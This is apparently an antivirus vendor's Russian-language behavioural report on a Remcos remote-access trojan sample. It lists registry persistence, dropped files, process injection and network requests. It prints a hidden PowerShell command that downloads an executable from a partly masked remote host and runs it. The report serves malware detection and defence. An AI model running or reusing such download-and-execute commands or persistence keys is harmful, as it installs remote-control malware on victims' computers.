Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run\] 'remoteaccess' = '"%APPDATA%\vlc\remcos.exe"'
Вредоносные функции
Загружает и запускает на исполнение
- http://sa###hamatan.ir/js/nw.exe как %appdata%\putty.exe
Внедряет код в
следующие пользовательские процессы:
- remcos.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\putty.exe
- %APPDATA%\vlc\remcos.exe
- %TEMP%\install.vbs
- %APPDATA%\app\logs.dat
Удаляет следующие файлы
- %TEMP%\install.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://sa###hamatan.ir/js/NW.exe
UDP
- DNS ASK sa###hamatan.ir
- DNS ASK no#####gy.myq-see.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\putty.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\install.vbs"
- '%APPDATA%\vlc\remcos.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sa###hamatan.ir/js/NW.exe','%APPDATA%\putty.exe');Start-Process '%APPD...' (со скрытым окном)
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\install.vbs"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c "%APPDATA%\vlc\remcos.exe"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c "%APPDATA%\vlc\remcos.exe"
